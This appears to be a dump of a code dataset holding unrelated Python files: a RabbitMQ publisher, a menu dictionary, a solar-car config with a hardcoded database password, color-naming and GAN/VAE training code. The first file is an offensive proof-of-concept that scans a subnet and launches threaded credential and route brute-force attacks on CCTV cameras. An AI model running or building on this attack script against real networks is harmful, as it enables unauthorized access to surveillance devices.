text stringlengths 38 1.54M |
|---|
import pyfiglet #pip
from colorama import init
from termcolor import colored
import sys, threading, os, time, json
from libs import getports as gp
from libs import attack_creds_first as attack
from libs import attack_routes_first as routeattack

# Cap on concurrently running attack threads: once reached, block on the
# newest thread before spawning more.
MAX_THREADS = 100

init()  # enable ANSI colour codes (needed on Windows consoles)
ascii_banner = pyfiglet.figlet_format("Pyllywood.")
print("{}\n{}\n\n".format(ascii_banner, "Hollywood-style CCTV hacking - PoC"))

#gp.discover('192.168.2.0/24') # Custom port scan (slower detection)
gp.masscan_target('192.168.2.0/24') # Masscan (quicker detection) - DEBUG logging have to vanish somehow
print(colored("[*] Giving 10 seconds for threads to die...", 'yellow'))
time.sleep(10)

# gp.targetList maps target -> {port: credentials-or-None}; a None value means
# the service needs a valid route discovered first, otherwise credentials.
portScanResults = gp.targetList
totalPortCount = sum(len(portScanResults[target]) for target in portScanResults)
if totalPortCount == 0:
    print(colored("[!] No targets found. Try a different network.", 'red'))
    sys.exit(0)
print(colored("[*] Found {} targets with a total of {} ports".format(len(portScanResults), totalPortCount), 'yellow'))
print(colored("[-] All targets that do NOT require authentication will be excluded - these are not supported yet", 'red'))
print(colored("[*] Starting credentials and routes attacks. Please be patient...", 'yellow'))

for target in portScanResults:
    for port in portScanResults[target]:
        if portScanResults[target][port] is None:  # fixed: identity test, not `== None`
            print(colored("[*] Target {}:{} requires a valid route first...".format(target, port), 'cyan'))
            thread = threading.Thread(target=routeattack.findValidRoutes, args=(target, port))
        else:
            print(colored("[*] Target {}:{} requires a valid account first...".format(target, port), 'cyan'))
            thread = threading.Thread(target=attack.attackCredentials, args=(target, port, portScanResults[target][port]))
        thread.start()
        # BUG FIX: the original compared `threading.active_count() == 100`,
        # which never throttles if the count skips past exactly 100; use >=.
        if threading.active_count() >= MAX_THREADS:
            thread.join()
|
import pika
import json

# A connection is a real TCP link to the RabbitMQ broker, while a channel is
# a lightweight virtual (AMQP) connection multiplexed over it — an
# application can open many channels without piling TCP connections onto the
# broker.
credentials = pika.PlainCredentials("user", "password")
parameters = pika.ConnectionParameters(
    host="localhost",
    port=5672,
    # A virtual host segregates applications sharing one RabbitMQ instance.
    virtual_host="/",
    credentials=credentials,
)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()

# Declare the queue we publish to (declaration is idempotent).
channel.queue_declare(queue="hello")

message = {"job": {}, "cwl": {}}

# A message is never sent straight to a queue — it always passes through an
# exchange. The default "" exchange is a Direct exchange that routes by queue
# name, so routing_key here is simply the queue name (with a topic exchange
# it could be a pattern instead).
channel.basic_publish(
    exchange="",
    routing_key="hello",
    body=json.dumps(message),  # body must be a serialized string
)
print(f"Message sent \n{message}")

# Closing flushes the network buffers so the message is actually delivered
# to RabbitMQ before the process exits.
connection.close()
# Menu catalogue keyed by product id. Each entry holds the fields needed to
# render one dish card:
#   path        - image URL for the dish photo
#   name        - dish name (Russian)
#   composition - ingredient list, newline-separated
#   price       - preformatted price string
#   button      - caption shown on the selection button
#   section     - menu section the dish belongs to
products = {
    'test1': {
        'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
        'name': 'Маргарита',
        'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
        'price': 'Цена: 65 000 сум',
        'button': 'Тестовое блюдо',
        'section': 'Тестовая секция'
    },
    'test2': {
        'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
        'name': 'Маргаритка',
        'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
        'price': 'Цена: 5 000 сум',
        'button': 'Тестовое блюдо 2',
        'section': 'Тестовая секция'
    },
    'test3': {
        'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
        'name': 'Маргаритац',
        'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
        'price': 'Цена: 65 001 сум',
        'button': 'Тестовое блюдо 3',
        'section': 'Тестовая секция 2'
    },
    'test4': {
        'path': 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWIqNg8W4CdYI0RNvT4zEjmfjE5mLqy06R7w&usqp=CAU',
        'name': 'Маргариткац',
        'composition': 'тесто на закваске\nсоус для пиццы\nсырный соус, сыр мозарелло, \nпомидор',
        'price': 'Цена: 5 001 сум',
        'button': 'Тестовое блюдо 4',
        'section': 'Тестовая секция 2'
    },
}
# Connection string for the database the car writes its data into.
SOURCEDB = 'mysql+mysqldb://solar:Phenix@localhost/solarcar'

# Database used by Telemetry to display data. There are two basic options:
#
# Option 1 (active): SQLite database — use this if you want an easy setup.
#   Pros: doesn't require MySQL on the laptop/box running Telemetry; starts
#         fresh when the code starts again.
#   Cons: slow to start up, no persistent data, and SQLite doesn't support a
#         'decimal' type, so rounding errors occur as data is converted to float.
TELEMETRYDB = 'sqlite:///temp.db'
# Option 2: full MySQL database — use this for a more reliable setup.
#   Pros: fast, persistent data.
#   Cons: MySQL can be hard to install.
#TELEMETRYDB = 'mysql+mysqldb://solar:Phenix@localhost/telemetry'

ORGNAME = "OSU Solar Vehicle Team"
CARNAME = "Phoenix"

# How long (in ms) the JavaScript should wait after receiving its last update
# before requesting another. Note: because Short graphs pull so much data,
# this value is multiplied by 10 there — change app/templates/short.html if
# you don't like that behavior.
UPDATE = 250

# Google Maps API key; get one at https://console.developers.google.com
GMAPSAPIKEY = ""
import math
import numpy as np
def im2c(im, w2c, color):
    """Map an RGB image to color-name output via a ``w2c`` lookup table.

    Python port of the MATLAB ``im2c`` from the Color Names work.

    Parameters
    ----------
    im : ndarray, shape (H, W, 3), float values in [0, 255]
        Input image (should be double/float, per the original MATLAB code).
    w2c : ndarray, shape (32768, 11)
        Lookup table mapping each quantized RGB bin to scores/probabilities
        over the 11 color names, in the order:
        black, blue, brown, grey, green, orange, pink, purple, red, white, yellow
    color : int
        0  -> return (H, W) array of 1-based color-name indices (argmax).
        -2 -> return (H, W, 11) array of per-pixel color-name scores.
        Any value in 1..11 or -1 aborts with "ERROR im2c" (NOTE(review): the
        original header comments promised color=-1 probabilities and
        color=1..11 single-name maps, but the code never implemented them).

    Returns
    -------
    ndarray or None (if ``color`` matches no supported branch).
    """
    # Quantize each channel into 32 bins of width 8 and build the lookup
    # index exactly as the MATLAB original:
    #   index = 1 + floor(R/8) + 32*floor(G/8) + 32*32*floor(B/8)
    # followed by -1 to convert the 1-based MATLAB index to 0-based.
    # Flattening with order='F' reproduces the original column-major
    # (RR1[i*H + j] = RR[j, i]) pixel ordering — the per-pixel Python double
    # loop of the original is replaced by equivalent vectorized NumPy ops.
    rr = np.floor(im[:, :, 0] / 8.0)
    gg = np.floor(im[:, :, 1] / 8.0)
    bb = np.floor(im[:, :, 2] / 8.0)
    index_im = (rr + 32 * gg + 32 * 32 * bb).astype('int').flatten(order='F')

    out = None  # returned unchanged if no branch below matches
    if color == 0:
        # 1-based index of the most likely color name per pixel.
        w2cM = np.argmax(w2c, axis=1) + 1
        out = w2cM[index_im].reshape((im.shape[0], im.shape[1]), order='F')
    if (color > 0 and color < 12) or (color == -1):
        print("ERROR im2c")
        exit()
    if color == -2:
        # Full score vector per pixel.
        out = w2c[index_im].reshape((im.shape[0], im.shape[1], w2c.shape[1]), order='F')
    return out
|
from infogan.models.regularized_gan import RegularizedGAN
import prettytensor as pt
import tensorflow as tf
import numpy as np
from progressbar import ETA, Bar, Percentage, ProgressBar
from infogan.misc.distributions import Bernoulli, Gaussian, Categorical
import sys
import os
import time
from infogan.misc.utils import save_images, inverse_transform, compute_cluster_scores
from sklearn.preprocessing import normalize
# Small numerical-stability constant (epsilon).
TINY = 1e-8
# Number of generated samples written to each preview image grid; must be a
# perfect square so the sqrt-based grid layout in train() works out.
logSamples = 64
class InfoGANTrainer(object):
    """Trainer for an (optionally semi-supervised) InfoGAN.

    init_opt() builds the TensorFlow graph and losses, train() runs the
    alternating discriminator/generator updates, and validate() scores the
    learned representation by clustering discriminator features.

    NOTE(review): this is Python 2 / pre-1.0 TensorFlow era code (print
    statements, xrange, tf.histogram_summary, prettytensor) — indentation
    below is reconstructed from a whitespace-mangled source.
    """
    def __init__(self,
                 model,
                 batch_size=128,
                 dataset=None,
                 val_dataset=None,
                 isTrain=True,
                 exp_name="experiment",
                 log_dir="logs",
                 checkpoint_dir="ckt",
                 samples_dir="samples",
                 max_epoch=100,
                 snapshot_interval=500,
                 info_reg_coeff=1.0,
                 discriminator_learning_rate=2e-4,
                 generator_learning_rate=2e-4,
                 semiSup = False,
                 ):
        """
        :type model: RegularizedGAN
        """
        # NOTE(review): isTrain is accepted but never stored or used here.
        self.model = model
        self.dataset = dataset
        self.val_dataset = val_dataset
        self.batch_size = batch_size
        self.max_epoch = max_epoch
        self.exp_name = exp_name
        self.log_dir = log_dir
        self.samples_dir = samples_dir
        self.checkpoint_dir = checkpoint_dir
        # A checkpoint is written every snapshot_interval training steps.
        self.snapshot_interval = snapshot_interval
        self.generator_learning_rate = generator_learning_rate
        self.discriminator_learning_rate = discriminator_learning_rate
        # Weight of the mutual-information term subtracted from both losses.
        self.info_reg_coeff = info_reg_coeff
        self.discriminator_trainer = None
        self.generator_trainer = None
        self.input_tensor = None
        # List of (name, tensor) pairs logged as scalar summaries.
        self.log_vars = []
        # When True, an extra supervised softmax head is added to D.
        self.semiSup = semiSup
        self.input_labels = None

    def init_opt(self):
        """Build placeholders, GAN losses, MI regularization and optimizers."""
        # Choose the input shape for the current dataset.
        if self.dataset.name == "mnist":
            shape = [self.dataset.image_dim]
        elif 'FOLDER' in self.dataset.name:
            print "Selected folder image"
            shape = list(self.dataset.output_size)
        else:
            shape = [self.dataset.output_size, self.dataset.output_size, 3]
        self.input_tensor = input_tensor = tf.placeholder(tf.float32, [self.batch_size] + shape)
        with pt.defaults_scope(phase=pt.Phase.train):
            self.z_var = self.model.latent_dist.sample_prior(self.batch_size)
            fake_x, _ = self.model.generate(self.z_var)
            self.sample_x, _ = self.model.generate(self.z_var)
            if self.semiSup:
                self.sup_d = self.model.discriminateSup(self.input_tensor,self.dataset.dataObj.getNclasses())
            self.fake_d = self.model.discriminate(fake_x)
            self.real_d = self.model.discriminate(input_tensor)
            # Discriminator features on real inputs, reused by validate().
            self.d_feat_real = self.real_d['features']
            if self.semiSup:
                self.input_labels = tf.placeholder(tf.float32, [self.batch_size,self.dataset.dataObj.getNclasses()])
                discriminator_loss_sup = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.sup_d['logits'], self.input_labels))
                # NOTE(review): this branch labels real as 0 / fake as 1 —
                # the opposite convention of the else-branch below; confirm intended.
                discriminator_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.real_d['logits'],tf.zeros_like(self.real_d['logits'])))
                discriminator_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'],tf.ones_like(self.real_d['logits'])))
                discriminator_loss = discriminator_loss_real + discriminator_loss_fake + discriminator_loss_sup
                generator_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'],tf.zeros_like(self.fake_d['logits'])))
                self.log_vars.append(("discriminator_sup_loss", discriminator_loss_sup))
            else:
                # Standard GAN losses: D pushes real->1 / fake->0, G pushes fake->1.
                discriminator_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.real_d['logits'], tf.ones_like(self.real_d['prob'])))
                discriminator_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'], tf.zeros_like(self.fake_d['prob'])))
                discriminator_loss = discriminator_loss_real + discriminator_loss_fake
                generator_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.fake_d['logits'], tf.ones_like(self.fake_d['prob'])))
            self.log_vars.append(("discriminator_loss_real", discriminator_loss_real))
            self.log_vars.append(("discriminator_loss_fake", discriminator_loss_fake))
            self.log_vars.append(("discriminator_loss", discriminator_loss))
            self.log_vars.append(("generator_loss", generator_loss))
            real_d_sum = tf.histogram_summary("real_d", self.real_d['prob'])
            fake_d_sum = tf.histogram_summary("fake_d", self.fake_d['prob'])
            # Mutual-information regularization — the "Info" part of InfoGAN.
            if self.model.is_reg:
                reg_z = self.model.reg_z(self.z_var)
                mi_est = tf.constant(0.)
                cross_ent = tf.constant(0.)
                # compute for discrete and continuous codes separately
                # discrete:
                if len(self.model.reg_disc_latent_dist.dists) > 0:
                    disc_reg_z = self.model.disc_reg_z(reg_z)
                    disc_reg_dist_info = self.model.disc_reg_dist_info(self.fake_d['reg_dist_info']) # Returns a dictionary of activations for each distribution
                    disc_log_q_c_given_x = self.model.reg_disc_latent_dist.logli(disc_reg_z, disc_reg_dist_info)
                    disc_log_q_c = self.model.reg_disc_latent_dist.logli_prior(disc_reg_z)
                    disc_cross_ent = tf.reduce_mean(-disc_log_q_c_given_x)
                    disc_ent = tf.reduce_mean(-disc_log_q_c)
                    disc_mi_est = disc_ent - disc_cross_ent
                    mi_est += disc_mi_est
                    cross_ent += disc_cross_ent
                    self.log_vars.append(("MI_disc", disc_mi_est))
                    self.log_vars.append(("CrossEnt_disc", disc_cross_ent))
                    # Subtracting the MI estimate rewards keeping the latent
                    # code recoverable from generated samples.
                    discriminator_loss -= self.info_reg_coeff * disc_mi_est
                    generator_loss -= self.info_reg_coeff * disc_mi_est
                    real_disc_reg_dist_info = self.model.disc_reg_dist_info(self.real_d['reg_dist_info'])
                    assert len(real_disc_reg_dist_info.keys()) == 1 # currently support only one categorical distribution
                    # Per-class probabilities on real inputs, used by validate().
                    self.disc_prob = real_disc_reg_dist_info[real_disc_reg_dist_info.keys()[0]]
                # continuous:
                if len(self.model.reg_cont_latent_dist.dists) > 0:
                    cont_reg_z = self.model.cont_reg_z(reg_z)
                    cont_reg_dist_info = self.model.cont_reg_dist_info(self.fake_d['reg_dist_info'])
                    cont_log_q_c_given_x = self.model.reg_cont_latent_dist.logli(cont_reg_z, cont_reg_dist_info)
                    cont_log_q_c = self.model.reg_cont_latent_dist.logli_prior(cont_reg_z)
                    cont_cross_ent = tf.reduce_mean(-cont_log_q_c_given_x)
                    cont_ent = tf.reduce_mean(-cont_log_q_c)
                    cont_mi_est = cont_ent - cont_cross_ent
                    mi_est += cont_mi_est
                    cross_ent += cont_cross_ent
                    self.log_vars.append(("MI_cont", cont_mi_est))
                    self.log_vars.append(("CrossEnt_cont", cont_cross_ent))
                    discriminator_loss -= self.info_reg_coeff * cont_mi_est
                    generator_loss -= self.info_reg_coeff * cont_mi_est
                # Log the std-dev range of any distribution that exposes one.
                for idx, dist_info in enumerate(self.model.reg_latent_dist.split_dist_info(self.fake_d['reg_dist_info'])):
                    if "stddev" in dist_info:
                        self.log_vars.append(("max_std_%d" % idx, tf.reduce_max(dist_info["stddev"])))
                        self.log_vars.append(("min_std_%d" % idx, tf.reduce_min(dist_info["stddev"])))
                self.log_vars.append(("MI", mi_est))
                self.log_vars.append(("CrossEnt", cross_ent))
            # Split trainable variables by the d_/g_ naming convention.
            all_vars = tf.trainable_variables()
            d_vars = [var for var in all_vars if var.name.startswith('d_')]
            g_vars = [var for var in all_vars if var.name.startswith('g_')]
            discriminator_optimizer = tf.train.AdamOptimizer(self.discriminator_learning_rate, beta1=0.5)
            self.discriminator_trainer = pt.apply_optimizer(discriminator_optimizer, losses=[discriminator_loss],
                                                            var_list=d_vars)
            generator_optimizer = tf.train.AdamOptimizer(self.generator_learning_rate, beta1=0.5)
            self.generator_trainer = pt.apply_optimizer(generator_optimizer, losses=[generator_loss], var_list=g_vars)
            for k, v in self.log_vars:
                tf.scalar_summary(k, v)
        # Build latent-traversal image summaries (only for small codes).
        if self.model.is_reg and self.dataset.name != 'imagenet':
            if self.model.encoder_dim <= 12: # Ugly conditioning!!! Fix later
                with pt.defaults_scope(phase=pt.Phase.test):
                    with tf.variable_scope("model", reuse=True) as scope:
                        self.visualize_all_factors()

    def visualize_all_factors(self):
        """Add image summaries that vary each regularized latent factor
        over a 10x10 grid while holding the other factors fixed."""
        with tf.Session():
            # First 100 rows: 10 fixed noise vectors, each repeated 10 times.
            fixed_noncat = np.concatenate([
                np.tile(
                    self.model.nonreg_latent_dist.sample_prior(10).eval(),
                    [10, 1]
                ),
                self.model.nonreg_latent_dist.sample_prior(self.batch_size - 100).eval(),
            ], axis=0)
            fixed_cat = np.concatenate([
                np.tile(
                    self.model.reg_latent_dist.sample_prior(10).eval(),
                    [10, 1]
                ),
                self.model.reg_latent_dist.sample_prior(self.batch_size - 100).eval(),
            ], axis=0)
        offset = 0
        for dist_idx, dist in enumerate(self.model.reg_latent_dist.dists):
            if isinstance(dist, Gaussian):
                assert dist.dim == 1, "Only dim=1 is currently supported"
                # Sweep the continuous code linearly over [-1, 1].
                c_vals = []
                for idx in xrange(10):
                    c_vals.extend([-1.0 + idx * 2.0 / 9] * 10)
                c_vals.extend([0.] * (self.batch_size - 100))
                vary_cat = np.asarray(c_vals, dtype=np.float32).reshape((-1, 1))
                cur_cat = np.copy(fixed_cat)
                cur_cat[:, offset:offset+1] = vary_cat
                offset += 1
            elif isinstance(dist, Categorical):
                # One-hot sweep: 10 rows per category value.
                lookup = np.eye(dist.dim, dtype=np.float32)
                cat_ids = []
                for idx in xrange(dist.dim):
                    cat_ids.extend([idx] * 10)
                cat_ids.extend([0] * (self.batch_size - 10 * dist.dim))
                print cat_ids
                cur_cat = np.copy(fixed_cat)
                print cur_cat.shape
                cur_cat[:, offset:offset+dist.dim] = lookup[cat_ids]
                offset += dist.dim
            elif isinstance(dist, Bernoulli):
                assert dist.dim == 1, "Only dim=1 is currently supported"
                lookup = np.eye(dist.dim, dtype=np.float32)
                cat_ids = []
                for idx in xrange(10):
                    cat_ids.extend([int(idx / 5)] * 10)
                cat_ids.extend([0] * (self.batch_size - 100))
                cur_cat = np.copy(fixed_cat)
                cur_cat[:, offset:offset+dist.dim] = np.expand_dims(np.array(cat_ids), axis=-1)
                # import ipdb; ipdb.set_trace()
                offset += dist.dim
            else:
                raise NotImplementedError
            z_var = tf.constant(np.concatenate([fixed_noncat, cur_cat], axis=1))
            x_dist_flat, x_dist_info = self.model.generate(z_var)
            # just take the mean image
            transform_type = 'output_dist'
            if isinstance(self.model.output_dist, Bernoulli):
                img_var = x_dist_info["p"]
            elif isinstance(self.model.output_dist, Gaussian):
                img_var = x_dist_info["mean"]
            elif self.model.output_dist is None:
                img_var = x_dist_flat
                transform_type = None
            else:
                raise NotImplementedError
            if transform_type == 'output_dist':
                img_var = self.dataset.inverse_transform(img_var)
            else:
                img_var = inverse_transform(img_var)
            # Tile the first rows*cols samples into one summary image.
            rows = dist.dim
            cols = 10
            img_var = tf.reshape(img_var, [self.batch_size] + list(self.dataset.image_shape))
            img_var = img_var[:rows * cols, :, :, :]
            imgs = tf.reshape(img_var, [rows, cols] + list(self.dataset.image_shape))
            stacked_img = []
            for row in xrange(rows):
                row_img = []
                for col in xrange(cols):
                    row_img.append(imgs[row, col, :, :, :])
                stacked_img.append(tf.concat(1, row_img))
            imgs = tf.concat(0, stacked_img)
            imgs = tf.expand_dims(imgs, 0)
            tf.image_summary("image_%d_%s" % (dist_idx, dist.__class__.__name__), imgs)

    def getFeedDict(self,dataset,semiSup):
        """Fetch one batch and build the feed dict (labels only if semiSup)."""
        x, labels = dataset.next_batch(self.batch_size)
        if semiSup:
            feed_dict = {self.input_tensor: x, self.input_labels: labels}
        else:
            feed_dict = {self.input_tensor: x}
        return feed_dict

    def train(self, sess):
        """Main training loop: 1 D update then 5 G updates per batch,
        with periodic checkpoints, sample grids and validation."""
        init = tf.initialize_all_variables()
        sess.run(init)
        summary_op = tf.merge_all_summaries()
        summary_writer = tf.train.SummaryWriter(self.log_dir, sess.graph)
        saver = tf.train.Saver()
        counter = 0
        log_vars = [x for _, x in self.log_vars]
        log_keys = [x for x, _ in self.log_vars]
        start_time = time.time()
        for epoch in range(self.max_epoch):
            widgets = ["epoch #%d|" % epoch, Percentage(), Bar(), ETA()]
            print("DatasetName ",self.dataset.name)
            print('batchIdx ',self.dataset.batch_idx)
            pbar = ProgressBar(maxval=self.dataset.batch_idx['train'], widgets=widgets)
            pbar.start()
            all_log_vals = []
            for i in range(self.dataset.batch_idx['train']):
                pbar.update(i)
                feed_dict = self.getFeedDict(self.dataset,self.semiSup)
                # One discriminator step; [1:] drops the train op's output.
                all_log_vals = sess.run([self.discriminator_trainer] + log_vars, feed_dict)[1:]
                # Five generator steps per discriminator step.
                for ii in range(5):
                    sess.run(self.generator_trainer, feed_dict)
                counter += 1
                if (counter % self.snapshot_interval == 0):
                    snapshot_name = "%s_%s" % (self.exp_name, str(counter))
                    fn = saver.save(sess, "%s/%s.ckpt" % (self.checkpoint_dir, snapshot_name))
                    print("Model saved in file: %s" % fn)
                # Save samples
                if counter % 10 == 0:
                    samples = sess.run(self.sample_x, feed_dict)
                    samples = samples[:logSamples, ...]
                    sqS = int(np.sqrt(logSamples))
                    if self.dataset.name != "mnist":
                        samples = inverse_transform(samples)
                    #xTolog = inverse_transform(x)[:logSamples, ...]
                    #save_images(xTolog, [sqS, sqS],'{}/trainDATA_{:02d}_{:04d}.png'.format(self.samples_dir, epoch, counter))
                    save_images(samples, [sqS, sqS],'{}/train_{:02d}_{:04d}.png'.format(self.samples_dir, epoch, counter))
                # Test on validation (test) set
                if counter % 500 == 1:
                    print "Validating current model on val set..."
                    self.validate(sess)
            # Get next batch
            #feed_dict = self.getFeedDict(self.dataset, self.semiSup)
            # Write summary to log file
            summary_str = sess.run(summary_op, feed_dict)
            summary_writer.add_summary(summary_str, counter)
            log_line = "; ".join("%s: %s" % (str(k), str(v)) for k, v in zip(log_keys, all_log_vals))
            print("Epoch %d | time: %4.4fs " % (epoch, time.time() - start_time) + log_line)
            sys.stdout.flush()
            if np.any(np.isnan(all_log_vals)):
                raise ValueError("NaN detected!")
        print "Train ended"
        # Test on validation (test) set
        snapshot_name = "last"
        fn = saver.save(sess, "%s/%s.ckpt" % (self.checkpoint_dir, snapshot_name))
        print("Model saved in file: %s" % fn)

    def validate(self, sess):
        """Cluster discriminator features (KMeans) and, when the categorical
        code size matches the label count, also predict classes directly;
        writes clustering scores to files under log_dir."""
        pred_labels = np.array([], dtype=np.int16).reshape(0,)
        pred_labels_kmeans = np.array([], dtype=np.int16).reshape(0,)
        labels = []
        n_clusters = self.val_dataset.n_labels
        # Direct prediction only works when D's categorical head has exactly
        # one unit per ground-truth class.
        if self.model.is_reg is True and self.model.encoder_dim == n_clusters:
            predict_directly = True
        else:
            predict_directly = False
        trainX = np.array([]).reshape(0, 0)
        def pool_features(feat, pool_type='avg'):
            # Spatially pool conv feature maps down to one vector per sample.
            # NOTE(review): the 'max' branch also calls mean() — presumably a
            # copy-paste slip, but left as-is since only 'avg' is used here.
            if len(feat.shape) >= 3:
                if pool_type == 'avg':
                    feat = feat.mean(axis=(1, 2))
                if pool_type == 'max':
                    feat = feat.mean(axis=(1, 2))
            return feat.reshape((feat.shape[0], feat.shape[-1]))
        print "Getting all the training features."
        for ii in range(self.val_dataset.batch_idx['train']):
            feed_dict = self.getFeedDict(self.dataset, self.semiSup)
            d_features = sess.run(self.d_feat_real, feed_dict)
            d_features = pool_features(d_features, pool_type='avg')
            if trainX.shape[0] == 0: # Is empty
                trainX = d_features
            else:
                trainX = np.concatenate((trainX, d_features), axis=0)
        trainX_norm = normalize(trainX, axis=1, norm='l2')
        print "Learning the clusters."
        from sklearn.cluster import KMeans
        kmeans = KMeans(n_clusters=n_clusters, init='k-means++').fit(trainX_norm)
        print "Extracting features from val set and predicting from it."
        for ii in range(self.val_dataset.batch_idx['val']):
            x, batch_labels = self.val_dataset.next_batch(self.batch_size, split="val")
            if type(batch_labels) == np.ndarray:
                batch_labels = list(batch_labels)
            labels = labels + batch_labels
            if predict_directly:
                d_prob = sess.run(self.disc_prob, {self.input_tensor: x})
                batch_pred_labels = np.argmax(d_prob, axis=1)
                pred_labels = np.concatenate((pred_labels, batch_pred_labels))
            d_features = sess.run(self.d_feat_real, {self.input_tensor: x})
            d_features = pool_features(d_features, pool_type='avg')
            d_features_norm = normalize(d_features, axis=1, norm='l2')
            batch_pred_labels_kmeans = kmeans.predict(d_features_norm)
            pred_labels_kmeans = np.concatenate((pred_labels_kmeans, batch_pred_labels_kmeans))
        if predict_directly:
            compute_cluster_scores(labels=np.asarray(labels), pred_labels=pred_labels, path=os.path.join(self.log_dir, 'scores.txt'))
        compute_cluster_scores(labels=np.asarray(labels), pred_labels=pred_labels_kmeans, path=os.path.join(self.log_dir, 'scores_kmeans.txt'))
|
from __future__ import print_function
import numpy as np
import argparse
import torch
import torch.utils.data
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import torch.nn.functional as F
import cv2 as cv
import random
# Command-line interface and data loaders. Fixed: several help strings were
# copy-pasted from --load-model and described the wrong option; the --epochs
# help also disagreed with its actual default (10).
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
                    help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
                    help='number of epochs to train (default: 10)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
                    help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
                    help='how many batches to wait before logging training status')
parser.add_argument('--sample-size', type=int, default=100, metavar='N',
                    help='number of samples to generate (should be perfect square)')
parser.add_argument('--eval-interval', type=int, default=1, metavar='N',
                    help='how many epochs to wait between evaluations')
parser.add_argument('--save-interval', type=int, default=10, metavar='N',
                    help='how many epochs to wait between model checkpoints')
parser.add_argument("--load-model", type=str,
                    help="The file containing already trained model.")
parser.add_argument("--save-model", default="vae_cifar", type=str,
                    help="Basename for saved model checkpoints.")
parser.add_argument("--save-image", default="vae_cifar", type=str,
                    help="Basename for saved sample-image grids.")
parser.add_argument("--temperature", default=1, type=float,
                    help="Gumbel-softmax temperature.")
parser.add_argument("--mode", type=str, default="train-eval", choices=["train", "eval", "train-eval"],
                    help="Operating mode: train and/or test.")
parser.add_argument("--num-samples", default=1, type=int,
                    help="The number of samples to draw from the latent distribution per input.")
parser.add_argument("--sigma", default=100, type=float,
                    help="KL-term weight (only used by the commented-out categorical loss).")
args = parser.parse_args()

torch.manual_seed(args.seed)

kwargs = {}
if "train" in args.mode:
    train_loader = torch.utils.data.DataLoader(
        datasets.CIFAR10('./data', train=True, download=True,
                         transform=transforms.ToTensor()),
        batch_size=args.batch_size, shuffle=True, **kwargs)
if "eval" in args.mode:
    test_loader = torch.utils.data.DataLoader(
        datasets.CIFAR10('./data', train=False, transform=transforms.ToTensor()),
        batch_size=args.batch_size, shuffle=True, **kwargs)
    # Second, unshuffled single-sample loader used for image dumps in test().
    test_loader2 = torch.utils.data.DataLoader(
        datasets.CIFAR10('./data', train=False, transform=transforms.ToTensor()),
        batch_size=1, shuffle=False, **kwargs)
if args.mode == "eval":
    if not args.load_model:
        raise ValueError("Need which model to evaluate")
    args.epoch = 1
    args.eval_interval = 1
class VAE(nn.Module):
    """Convolutional VAE for 3x32x32 images (CIFAR-10).

    Encoder: three stride-2 convolutions down to a (16*8)x4x4 feature map,
    flattened to 2048 and projected to a ``z_size``-dim Gaussian (mu, logvar).
    Decoder: linear projection back to (16*8)x4x4 followed by three stride-2
    transposed convolutions up to 3x32x32 with a final Sigmoid.
    (A previous commented-out architecture variant was removed.)
    """

    def __init__(self):
        super(VAE, self).__init__()
        self.z_size = 60  # dimensionality of the latent Gaussian code
        # self.cat_size = 10  # disabled categorical code
        self.fc1 = nn.Sequential(
            # input: 3 x 32 x 32
            nn.Conv2d(3, 16 * 2, 4, 2, 1, bias=False),
            nn.BatchNorm2d(16 * 2),
            nn.LeakyReLU(0.2, inplace=True),
            # (16*2) x 16 x 16
            nn.Conv2d(16 * 2, 16 * 4, 4, 2, 1, bias=False),
            nn.BatchNorm2d(16 * 4),
            nn.LeakyReLU(0.2, inplace=True),
            # (16*4) x 8 x 8
            nn.Conv2d(16 * 4, 16 * 8, 4, 2, 1, bias=False)
            # (16*8) x 4 x 4 -> flattened to 2048 in encode()
        )
        self.fc21 = nn.Linear(2048, self.z_size)  # mu head
        self.fc22 = nn.Linear(2048, self.z_size)  # logvar head
        self.fc3 = nn.Linear(self.encoder_size(), 16*8*4*4)
        self.fc4 = nn.Sequential(
            # input: (16*8) x 4 x 4
            nn.ConvTranspose2d(16 * 8, 16 * 4, 4, 2, 1, bias=False),
            nn.BatchNorm2d(16 * 4),
            nn.ReLU(True),
            # (16*4) x 8 x 8
            nn.ConvTranspose2d(16 * 4, 16 * 2, 4, 2, 1, bias=False),
            nn.BatchNorm2d(16 * 2),
            nn.ReLU(True),
            # (16*2) x 16 x 16
            nn.ConvTranspose2d(16 * 2, 3, 4, 2, 1, bias=False),
            nn.Sigmoid()
            # 3 x 32 x 32
        )
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()
        self.softmax = nn.Softmax()

    def encoder_size(self):
        """Size of the latent vector consumed by the decoder."""
        return self.z_size  # + self.cat_size

    def encode(self, x):
        """Return (mu, logvar) of the approximate posterior q(z|x)."""
        h1 = self.fc1(x)
        h1 = h1.view(-1, 2048)  # flatten (16*8) x 4 x 4
        return self.fc21(h1), self.fc22(h1)

    def reparametrize_normal(self, mu, logvar):
        """Sample z = mu + std * eps with eps ~ N(0, I).

